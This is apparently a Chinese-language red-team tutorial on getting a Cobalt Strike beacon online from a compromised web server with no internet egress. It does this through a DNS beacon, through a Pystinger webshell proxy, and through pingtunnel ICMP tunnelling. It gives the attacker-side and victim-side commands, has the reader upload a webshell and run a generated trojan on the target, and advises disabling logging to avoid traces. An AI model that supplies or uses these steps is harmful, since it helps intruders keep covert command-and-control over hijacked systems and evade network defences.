不出网上线cs
通过DNS上线
在拿到网站后发现只有DNS能出网,这时候就可以通过DNS上线
第一步需要一个域名,然后配置域名的ns记录
在cs的监听器中新增一个DNS监听器,注意选择Beacon DNS
如果出现下面这种错误表示53端口被systemd-resolved占用了
关闭方法:systemctl stop system-resolved
生成一个马运行后上线
在上线之后,图标是一个黑框,与http和tcp的不一样它没有60秒的睡眠,有时甚至以为beacon死掉了,其实如果要和beacon交互还需要输入checkin命令,这时候图标就会变回正常上线时的图标,但速度是真的慢,所以需要修改一下传输方式,输入mode dns-txt命令后,速度就会比刚才快了,但进行上传下载时还是慢。
稳定性取决于网络情况,就算修改为dns-txt,相比于默认方式的快了许多,但进行上传和下载的时候还是很难受。
通过Pystinger上线cs
pystinger可通过webshell实现sock4代理、端口映射,在无法出网的机器上上线cs。
下载地址:https://github.com/FunnyWolf/pystinger
1.将webshell上传到服务器,能正常访问
将文件上传到目标服务器后启动。
linux:./stinger_server 0.0.0.0
windows:start stinger_server.exe 0.0.0.0
在自己的cs服务器上运行
./stinger_client -w http://目标web地址/proxy.php -l 127.0.0.1 -p 60000
意思是将目标流量转发到自己服务器的60000端口
监听器配置
生成马,目标服务器运行后上线
通过icmp上线cs
pingtunnel
下载地址:https://github.com/esrrhs/pingtunnel
该工具是将流量伪装成icmp流量
1.先在自己的服务器上开启服务端
命令:./pingtunnel -type server
2.客户端命令:pingtunnel.exe -type client -l 127.0.0.1:8888 -s 192.168.1.71-t 192.168.1.71:9999 -tcp 1 -noprint 1 -nolog 1
这里建议带上-noprint 1 -nolog 1 防止产生大量日志和数据
这时候客户端已经成功链接上服务端
3.创建两个监听器
用127.0.0.1的监听器生成木马上传到服务器运行后成功上线